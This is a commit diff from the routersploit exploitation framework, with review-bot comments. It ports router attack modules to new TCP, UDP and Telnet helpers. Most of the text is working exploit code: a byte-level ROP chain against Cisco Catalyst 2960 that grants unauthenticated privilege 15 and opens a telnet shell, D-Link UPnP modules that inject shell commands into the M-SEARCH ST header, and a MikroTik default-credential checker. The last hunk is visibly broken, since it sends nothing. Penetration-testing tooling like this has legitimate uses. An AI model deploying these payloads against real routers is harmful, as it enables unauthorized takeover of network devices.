
Commit 0401a67

TCP & UDP based exploits (#451)
* Fixing TCP & UDP based exploits * Fixing Mikrotik API ROS
1 parent 214a544 commit 0401a67


8 files changed

+158
-179
lines changed


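--- a/routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
+++ b/routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
@@ -71,14 +71,16 @@ def target_function(self, running, creds):
     def check(self):
         tcp_client = self.tcp_connect()
         if tcp_client:
+            self.tcp_close(tcp_client)
             return True
 
         return False
 
     def check_default(self):
         self.credentials = []
 
-        self.run_threads(self.target_function, self.defaults)
+        data = LockedIterator(self.defaults)
+        self.run_threads(self.threads, self.target_function, data)
 
         if self.credentials:
             return self.credentials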
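Review bot: `check` returns True for any host that accepts a TCP connection on the configured port, which only shows the port is open, not that the RouterOS API is listening or that a default credential works, and nothing in the hunk says so; a docstring such as `"""Return True if the target accepts a TCP connection on the API port; this does not verify the service or any credentials."""` would stop callers reading True as "vulnerable". `LockedIterator` is not imported anywhere in this hunk; if it does not arrive through the file's star import from routersploit.core.exploit, `check_default` will raise NameError on first use. `check_default` continues past the end of the hunk, so the no-credentials path is not visible here.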

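--- a/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
+++ b/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
@@ -1,10 +1,9 @@
-import socket
-import telnetlib
 from routersploit.core.exploit import *
 from routersploit.core.tcp.tcp_client import TCPClient
+from routersploit.core.telnet.telnet_client import TelnetClient
 
 
-class Exploit(TCPClient):
+class Exploit(TCPClient, TelnetClient):
     __info__ = {
         "name": "Cisco Catalyst 2960 ROCEM RCE",
         "description": "Module exploits Cisco Catalyst 2960 ROCEM RCE vulnerability. "
@@ -37,126 +36,126 @@ def __init__(self):
             # Cisco Catalyst 2960 IOS 12.2(55)SE1
             {
                 "template": (
-                    "\xff\xfa\x24\x00" +
-                    "\x03CISCO_KITS\x012:" +
-                    "A" * 116 +
+                    b"\xff\xfa\x24\x00" +
+                    b"\x03CISCO_KITS\x012:" +
+                    b"A" * 116 +
                     # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x00\x00\x37\xb4" +
+                    b"\x00\x00\x37\xb4" +
                     # next bytes are shown as offsets from r1
                     # +8 address of pointer to is_cluster_mode function - 0x34
-                    "\x02\x2c\x8b\x74" +
-                    "{FUNC_IS_CLUSTER_MODE}" +
+                    b"\x02\x2c\x8b\x74" +
+                    b"{FUNC_IS_CLUSTER_MODE}" +
                     # +16(+0) r1 points here at second gadget
-                    "BBBB" +
+                    b"BBBB" +
                     # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
-                    "\x00\xdf\xfb\xe8" +
+                    b"\x00\xdf\xfb\xe8" +
                     # +8
-                    "CCCC" +
+                    b"CCCC" +
                     # +12
-                    "DDDD" +
+                    b"DDDD" +
                     # +16(+0) r1 points here at third gadget
-                    "EEEE" +
+                    b"EEEE" +
                     # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
-                    "\x00\x06\x78\x8c" +
+                    b"\x00\x06\x78\x8c" +
                     # +8 r1+8 = 0x022c8b60
-                    "\x02\x2c\x8b\x60" +
+                    b"\x02\x2c\x8b\x60" +
                     # +12
-                    "FFFF" +
+                    b"FFFF" +
                     # +16(+0) r1 points here at fourth gadget
-                    "GGGG" +
+                    b"GGGG" +
                     # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
-                    "\x00\x6b\xa1\x28" +
-                    "{FUNC_PRIVILEGE_LEVEL}" +
+                    b"\x00\x6b\xa1\x28" +
+                    b"{FUNC_PRIVILEGE_LEVEL}" +
                     # +12
-                    "HHHH" +
+                    b"HHHH" +
                     # +16(+0) r1 points here at fifth gadget
-                    "IIII" +
+                    b"IIII" +
                     # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x01\x48\xe5\x60" +
+                    b"\x01\x48\xe5\x60" +
                     # +8 r1 points here at third gadget
-                    "JJJJ" +
+                    b"JJJJ" +
                     # +12
-                    "KKKK" +
+                    b"KKKK" +
                     # +16
-                    "LLLL" +
+                    b"LLLL" +
                     # +20 original execution flow return addr
-                    "\x01\x13\x31\xa8" +
-                    ":15:" + "\xff\xf0"
+                    b"\x01\x13\x31\xa8" +
+                    b":15:" + b"\xff\xf0"
                 ),
                 "func_is_cluster_mode": {
                     # +12 set address of func that rets 1
-                    "set": "\x00\x00\x99\x80",
+                    "set": b"\x00\x00\x99\x80",
                     # unset
-                    "unset": "\x00\x04\xea\x58"
+                    "unset": b"\x00\x04\xea\x58"
                 },
                 "func_privilege_level": {
                     # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
-                    "set": "\x00\x12\x52\x1c",
+                    "set": b"\x00\x12\x52\x1c",
                     # unset
-                    "unset": "\x00\x04\xe6\xf0"
+                    "unset": b"\x00\x04\xe6\xf0"
                 }
             },
 
             # Cisco Catalyst 2960 IOS 12.2(55)SE11
             {
                 "template": (
-                    "\xff\xfa\x24\x00" +
-                    "\x03CISCO_KITS\x012:" +
-                    "A" * 116 +
+                    b"\xff\xfa\x24\x00" +
+                    b"\x03CISCO_KITS\x012:" +
+                    b"A" * 116 +
                     # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x00\x00\x37\xb4" +
+                    b"\x00\x00\x37\xb4" +
                     # next bytes are shown as offsets from r1
                     # +8 address of pointer to is_cluster_mode function - 0x34
-                    "\x02\x3d\x55\xdc" +
-                    "{FUNC_IS_CLUSTER_MODE}" +
+                    b"\x02\x3d\x55\xdc" +
+                    b"{FUNC_IS_CLUSTER_MODE}" +
                     # +16(+0) r1 points here at second gadget
-                    "BBBB" +
+                    b"BBBB" +
                     # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
-                    "\x00\xe1\xa9\xf4" +
+                    b"\x00\xe1\xa9\xf4" +
                     # +8
-                    "CCCC" +
+                    b"CCCC" +
                     # +12
-                    "DDDD" +
+                    b"DDDD" +
                     # +16(+0) r1 points here at third gadget
-                    "EEEE" +
+                    b"EEEE" +
                     # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
-                    "\x00\x06\x7b\x5c" +
+                    b"\x00\x06\x7b\x5c" +
                     # +8 r1+8 = 0x23d55c8
-                    "\x02\x3d\x55\xc8" +
+                    b"\x02\x3d\x55\xc8" +
                     # +12
-                    "FFFF" +
+                    b"FFFF" +
                     # +16(+0) r1 points here at fourth gadget
-                    "GGGG" +
+                    b"GGGG" +
                     # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
-                    "\x00\x6c\xb3\xa0" +
-                    "{FUNC_PRIVILEGE_LEVEL}" +
+                    b"\x00\x6c\xb3\xa0" +
+                    b"{FUNC_PRIVILEGE_LEVEL}" +
                     # +12
-                    "HHHH" +
+                    b"HHHH" +
                     # +16(+0) r1 points here at fifth gadget
-                    "IIII" +
+                    b"IIII" +
                     # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x01\x4a\xcf\x98" +
+                    b"\x01\x4a\xcf\x98" +
                     # +8 r1 points here at third gadget
-                    "JJJJ" +
+                    b"JJJJ" +
                     # +12
-                    "KKKK" +
+                    b"KKKK" +
                     # +16
-                    "LLLL" +
+                    b"LLLL" +
                     # +20 original execution flow return addr
-                    "\x01\x14\xe7\xec" +
-                    ":15:" + "\xff\xf0"
+                    b"\x01\x14\xe7\xec" +
+                    b":15:" + b"\xff\xf0"
                 ),
                 "func_is_cluster_mode": {
                     # +12 set address of func that rets 1
-                    "set": "\x00\x00\x99\x9c",
+                    "set": b"\x00\x00\x99\x9c",
                     # unset
-                    "unset": "\x00\x04\xeA\xe0"
+                    "unset": b"\x00\x04\xeA\xe0"
                 },
                 "func_privilege_level": {
                     # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
-                    "set": "\x00\x27\x0b\x94",
+                    "set": b"\x00\x27\x0b\x94",
                     # unset
-                    "unset": "\x00\x04\xe7\x78"
+                    "unset": b"\x00\x04\xe7\x78"
                 }
             }
         ]
@@ -172,13 +171,12 @@ def run(self):
 
         print_status("Trying to connect to Telnet service on port {}".format(self.telnet_port))
 
-        try:
-            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            s.connect((self.target, int(self.telnet_port)))
-
+        tcp_client = self.tcp_connect()
+        if tcp_client:
+            response = self.tcp_recv(tcp_client, 1024)
             print_status("Connection OK")
-            print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
-        except Exception:
+            print_status("Received bytes from telnet service: {}".format(repr(response)))
+        else:
             print_error("Connection failed")
             return
 
@@ -191,25 +189,25 @@ def run(self):
             print_status("Unsetting credless privilege 15 authentication")
 
         print_status("Sending cluster option")
-        s.send(payload)
-        s.close()
+        self.tcp_send(tcp_client, payload)
+        self.tcp_close(tcp_client)
 
         print_status("Payload sent")
 
         if self.action == 'set':
             print_status("Connecting to Telnet service...")
-            try:
-                t = telnetlib.Telnet(self.target, int(self.telnet_port))
-                t.interact()
-            except Exception:
+            telnet_client = self.telnet_connect()
+            if telnet_client:
+                self.telnet_interactive(telnet_client)
+            else:
                 print_error("Exploit failed")
         else:
             print_status("Check if Telnet authentication was set back")
 
     def build_payload(self):
         payload = self.payloads[self.device]['template']
-        payload = payload.replace("{FUNC_IS_CLUSTER_MODE}", self.payloads[self.device]['func_is_cluster_mode'][self.action])
-        payload = payload.replace("{FUNC_PRIVILEGE_LEVEL}", self.payloads[self.device]['func_privilege_level'][self.action])
+        payload = payload.replace(b"{FUNC_IS_CLUSTER_MODE}", self.payloads[self.device]['func_is_cluster_mode'][self.action])
+        payload = payload.replace(b"{FUNC_PRIVILEGE_LEVEL}", self.payloads[self.device]['func_privilege_level'][self.action])
 
         return payload
 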
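Review bot: In the `run` hunk at old lines 175-177 the explicit connect to `int(self.telnet_port)` is replaced by a bare `self.tcp_connect()`, while the status line right above it still prints `self.telnet_port`; if `telnet_port` is an option distinct from the `port` that tcp_connect() presumably defaults to, the module now sends the ROP payload to a different port than it reports, and a wrong-port send silently "succeeds". Either pass the port through, `tcp_client = self.tcp_connect(port=self.telnet_port)` if the helper accepts one, or retire `telnet_port` and format the message with the same port tcp_connect() uses. The result of `self.tcp_send(tcp_client, payload)` is also not examined before "Payload sent" is printed, so a failed send is reported as success; checking it (if tcp_send signals failure) and returning early would keep the unset/set state honest. `run` begins and ends outside these hunks.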

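--- a/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
+++ b/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
@@ -35,42 +35,40 @@ def run(self):
         print_error("Exploit failed - target seems to be not vulnerable")
 
     def execute(self, cmd):
-        buf = ("M-SEARCH * HTTP/1.1\r\n"
-               "Host:239.255.255.250:1900\r\n"
-               "ST:uuid:`" + cmd + "`\r\n"
-               "Man:\"ssdp:discover\"\r\n"
-               "MX:2\r\n\r\n")
+        cmd = bytes(cmd, "utf-8")
 
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-            sock.settimeout(10)
-            sock.connect((self.target, 1900))
-            sock.send(buf)
-            sock.close()
-        except socket.error:
-            pass
+        request = (
+            b"M-SEARCH * HTTP/1.1\r\n" +
+            b"Host:239.255.255.250:1900\r\n" +
+            b"ST:uuid:`" + cmd + b"`\r\n" +
+            b"Man:\"ssdp:discover\"\r\n" +
+            b"MX:2\r\n\r\n"
+        )
+
+        udp_client = self.udp_create()
+        self.udp_send(udp_client, request)
+        self.udp_close(udp_client)
 
         return ""
 
     @mute
     def check(self):
-        buf = ("M-SEARCH * HTTP/1.1\r\n"
-               "Host:239.255.255.250:1900\r\n"
-               "ST:upnp:rootdevice\r\n"
-               "Man:\"ssdp:discover\"\r\n"
-               "MX:2\r\n\r\n")
+        request = (
+            b"M-SEARCH * HTTP/1.1\r\n"
+            b"Host:239.255.255.250:1900\r\n"
+            b"ST:upnp:rootdevice\r\n"
+            b"Man:\"ssdp:discover\"\r\n"
+            b"MX:2\r\n\r\n"
+        )
+
+        udp_client = self.udp_create()
 
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-            sock.settimeout(10)
-            sock.connect((self.target, 1900))
-            sock.send(buf)
-            response = sock.recv(65535)
-            sock.close()
-        except Exception:
-            return False  # target is not vulnerable
+        if udp_client:
+            self.udp_send(udp_client, request)
+            response = self.udp_recv(udp_client, 65535)
+            self.udp_close(udp_client)
 
-        if "Linux, UPnP/1.0, DIR-" in response:
-            return True  # target is vulnerable
+            if response and "Linux, UPnP/1.0, DIR-" in response:
+                return True  # target is vulnerable
 
         return False  # target is not vulnerable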
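Review bot: In `check`, `"Linux, UPnP/1.0, DIR-" in response` tests a str against what is now a bytes response (the request is built as bytes, and udp_recv presumably hands back the raw datagram), which on Python 3 raises TypeError instead of returning False, so a vulnerable device can never be reported; change it to `if response and b"Linux, UPnP/1.0, DIR-" in response:`. `execute` calls `self.udp_send(udp_client, request)` without the `if udp_client:` guard that `check` uses, so a failed `udp_create()` raises from inside the command path rather than being reported; the same guard belongs there. The removed code set a 10-second socket timeout that nothing in the new code replaces; unless `udp_create()` applies one, `check` can block indefinitely on a target that never answers the M-SEARCH.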

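--- a/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
+++ b/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
@@ -30,16 +30,19 @@ def run(self):
         shell(self, architecture="mipsle")
 
     def execute(self, cmd):
-        buf = ('M-SEARCH * HTTP/1.1\r\n'
-               'HOST:' + self.target + ':1900\r\n'
-               'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
-               'MX:2\r\n'
-               'MAN:"ssdp:discover"\r\n\r\n')
-
-        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        s.connect((self.target, 1900))
-        s.send(buf)
-        s.close()
+        request = (
+            "M-SEARCH * HTTP/1.1\r\n" +
+            "HOST:{}:{}\r\n".format(self.target, self.port) +
+            "ST:urn:schemas-upnp-org:service:WANIPConnection:1;{};ls\r\n".format(cmd) +
+            "MX:2\r\n" +
+            "MAN:\"ssdp:discover\"\r\n\r\n"
+        )
+
+        request = bytes(request, "utf-8")
+
+        udp_client = self.udp_create()
+        self.udp_send(udp_client)
+        self.udp_close(udp_client)
 
         return ""
 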
